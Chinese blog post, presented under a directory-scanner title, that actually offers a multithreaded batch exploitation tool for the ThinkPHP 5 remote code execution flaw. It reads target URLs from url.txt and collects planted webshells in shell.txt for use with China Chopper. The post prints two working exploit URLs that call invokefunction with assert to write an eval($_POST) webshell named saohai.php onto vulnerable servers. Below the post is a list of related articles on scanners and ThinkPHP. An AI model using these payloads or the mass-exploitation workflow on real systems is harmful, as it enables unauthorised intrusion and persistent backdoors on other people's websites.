php网站目录扫描工具,thinkphp5批量扫描工具

最新推荐文章于 2024-04-07 09:39:07 发布
最新推荐文章于 2024-04-07 09:39:07 发布
阅读量634 收藏
点赞数
文章标签: php网站目录扫描工具

本来12.12就看到了,当时看了全球统计,也就30多万个站

mdzz,觉得没啥好搞的,昨天,骚海找到我,给做批量出来,自己的太慢了,稳定性不好

ok,花了一天时间,写了出来(其中还是一堆的问题,不过还行,能解决)

主要加了多线程、自动检测(poc证明不同版本exp不同,windows和liunux又不同,因此存在一个shell出多个密码覆盖重写的情况)

复现:

8fb5ff86e14d96a31c175a36a827c5c3.png

工具效果:

2e03369d5790a94855d40179b7c889a9.png

下载地址:下载链接

用法:exe目录有个url.txt即可,自动读取开始扫描,shell生成到shell.txt

然后直接上菜刀

主要exp:

/index.php/?s=index/\think\Container/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>')

/index.php/?s=index/\think\app/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>');

具体的其他各大网站自己去整合

有些是:

/index.php?s=

还有些:

/index.php/?s=

weixin_39831567
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 文件扫描,php中的文件目录扫描
weixin_39636253的博客
03-11 656
php遍历目录与文件夹的多种方法详解作者: 字体:[增加 减小] 类型:转载介绍几个php遍历目录的方法,可以遍历目录目录中的文件,供大家参考遍历目录或遍历目录下指定类型的文件,这是每一个童鞋在写程序的时候难免会用到的。PHP本身也提供了很多灰常有用的函数,正确地使用它们,不会有错滴。下面就我个人学习过程中的一些总结,希望对想学PHP的童鞋有所帮助。本函数可以列出指定目录下所有的文件(包括子目录...
ThinkPhp日志文件遍历工具
04-08
ThinkPhp日志文件遍历工具,主要面对日志文件未编写
CTF——9款网站目录扫描工具推荐——附下载链接与相关字典
热门推荐
weixin_51735061的博客
04-17 2万+
九款常用的网站目录扫描软件推荐(附免费下载链接),CTF解题好帮手,以及百万条数据字典分享~~~ 御剑-DirBuster-Dirmap-WebPathBrute-wwwscan.....
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
ThinkPHP v5.x命令执行利用工具(可getshell)
探索《ThinkphpPOC-EXP》:一款强大的 ThinkPHP 漏洞检测工具
最新发布
gitblog_00051的博客
04-07 353
探索《ThinkphpPOC-EXP》:一款强大的 ThinkPHP 漏洞检测工具 项目地址:https://gitcode.com/admin360bug/ThinkphpPOC-EXP 项目简介 ThinkphpPOC-EXP 是一个专注于 ThinkPHP 框架的安全漏洞检测工具,由 admin360bug 开发并维护。此项目主要用于帮助网站管理员和安全研究人员快速识别 ThinkPHP ...
thinkphp漏洞检测工具
06-06
thinkphp漏洞检测工具
安装thinkPHP V5
weixin_44739460的博客
09-05 788
第一步:用浏览器打开http://www.thinkphp.cn/  第二步:下载thinkphp_5.0.24_完整版 第三步:解压文件到桌面新建文件夹tp5中,将其放到phpstudy下的www中 第四步:配置phpstuday的站点域名管理改为www.tp5.com网站目录改为www下public 点击新增 第五步:打开浏览器输入http://localhost/tp5/public/出现 ...
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3464
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
网站目录扫描工具webdirscan
OldBowl
05-15 1万+
使用
网站后台目录扫描工具Dirbuster和御剑(脚本小子的最爱)
anan的博客
09-10 1万+
今天说两款网站目录扫描工具,一款OWASP的开源工具,另一个是国产的御剑。 DirBuster是一款基于java开发的多线程网站后台目录和文件爆破工具。因为是java开发,所以想使用该软件请在电脑安装jdk(其实是需要jre环节)然后就可以直接使用了! 这是我的DirBuster,可以看到后缀是jar,所以不要解压直接右键打开方式选择java(配置jdk后才有)打开就可以运行了 运行的界面是这...
服务器文件扫描,网站目录文件扫描工具dirbuster
weixin_39728320的博客
08-09 2237
网站目录扫描工具很多,最开始用的wwwscan 、御剑,甚至一些小扫描器自带的比如,椰树、北极熊用来用去,最终你还是会发现,一些个人写的工具真的都是渣渣要么后门,要么崩溃闪退,小白用用还是可以的,但是最终你需要的还是工具的系统化专业化,总不能一直用二三流的工具我打算后面长期用dirbuster来进行各种渗透测试1. kali打开打开dirb 和dirbuster是一样的,就跟nmap 和nma...
敏感文件/目录扫描工具 dirsearch
single_g_l的博客
12-28 1万+
目录 1、dirsearch 是什么? 2、dirsearch的下载和安装 3、在dirsearch.py所在目录,输入cmd,进入命令行 4、dirsearch 的 参数 5、实战 6、查看响应码为200的目录 1、dirsearch 是什么? dirsearch 是一个python开发的目录扫描工具。和我们平时使用的御剑之类的工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口。 2、dirsearch的下载和安装 下载地址: http://链接: https:...
目录扫描工具Dirsearch
08-03
用于漏洞扫描目录扫描,可以很好的发现潜在的漏洞,
thinkphp5 migrate数据库迁移工具
12-20
tp5相对与tp3.2有很大的不同 migrate是其中一点,通过migrate程序员可以在php代码中创建数据库修改回滚等操作 首先下载migrate扩展,命令行到当前项目目录下执行 composer require topthink/think-migration 通过...
ThinkPHP+工具箱源码
10-25
提供了各种在线工具:JSON格式化、压缩转义、生成C#、Java、Go实体类、SQL转Java实体类、XML和JSON互转、Excel/CSV转JSON、JSON转Excel/CSV、JSON和GET参数互转、JSON转YAML、HTML/CSS/JS格式化/压缩、加解密编码、...
TPLogScan:ThinkPHP全日志扫描工具,命令行版和BurpSuite插件版
05-29
ThinkPHP3和5日志扫描工具,提供命令行版和BurpSuite插件版,尽可能全的发掘网站日志信息 命令行版 安装 git clone https://github.com/r3change/TPLogScan.git cd TPLogScan/ pip install -r requirements.txt 使用...
tp5(thinkPHP5框架)使用DB实现批量删除功能示例
01-20
本文实例讲述了tp5(thinkPHP5框架)使用DB实现批量删除功能。分享给大家供大家参考,具体如下: 1-前端页面 html </i> 批量删除 <td><input type=checkbox value={$category.id} name=id> js function ...
thinkPHP5搭建以及使用
weixin_30500105的博客
11-27 188
   0X01 Thinkphp 的安装 我这里选择的是使用 windows 下的 composer 进行安装,收下首先下载 composer 这个工具,安装完成以后进入我们想要创建项目的文件夹输入下面的命令 ? 1 composer create-project topthink/think tp5 dev-master --prefe...
thinkphp linux,ThinkPHP V5 Linux Composer 安装与使用
weixin_39812142的博客
05-25 168
Composer 是 PHP 的一个依赖管理工具。我们可以在项目中声明所依赖的外部工具库,Composer 会帮你安装这些依赖的库文件,有了它,我们就可以很轻松的使用一个命令将其他人的优秀代码引用到我们的项目中来。Composer 的安装全局安装你可以将此文件放在任何地方。如果你把它放在系统的 PATH 目录中,你就能在全局访问它。 在类Unix系统中,你甚至可以在使用时不加 php 前缀。你可以...
thinkphp挂马扫描软件
10-07
ThinkPHP是一种流行的开源PHP开发框架,被许多Web开发人员广泛使用。由于其广泛性,ThinkPHP常常成为黑客进行攻击的目标。挂马指的是黑客通过植入恶意脚本或程序来控制网站或服务器,以达到非法盈利或攻击的目的。为了保护网站和服务器的安全,扫描软件可以用来检测挂马漏洞。 ThinkPHP挂马扫描软件是专门针对ThinkPHP框架的安全扫描工具。它可以检测并定位可能存在的挂马漏洞,同时提供修复建议。这种软件能够对网站代码进行深度扫描,检查是否存在ThinkPHP的特定漏洞,例如访问控制不当或代码注入等。通过快速识别安全风险,挂马扫描软件可以帮助网站管理员及时采取对应的安全措施,尽量避免黑客的攻击。 使用ThinkPHP挂马扫描软件的过程相对简单。首先,用户需要安装并配置软件,将其与待扫描ThinkPHP项目相关联。然后,用户可以选择进行全面扫描或针对指定漏洞进行扫描扫描结果将生成一个报告,报告会列出存在的漏洞和相应的修复建议。用户可以根据报告中的信息,及时采取措施来修复漏洞,提高网站的安全性。 总之,ThinkPHP挂马扫描软件是一种用于检测并修复ThinkPHP框架中可能存在的挂马漏洞的工具。它能够帮助网站管理员及时发现并修复安全风险,保证网站和服务器的安全性。但是需要注意的是,即使使用了挂马扫描软件,网站管理员仍然需要采取其他安全措施,例如加强访问控制、定期更新框架版本等,以确保网站的全面安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值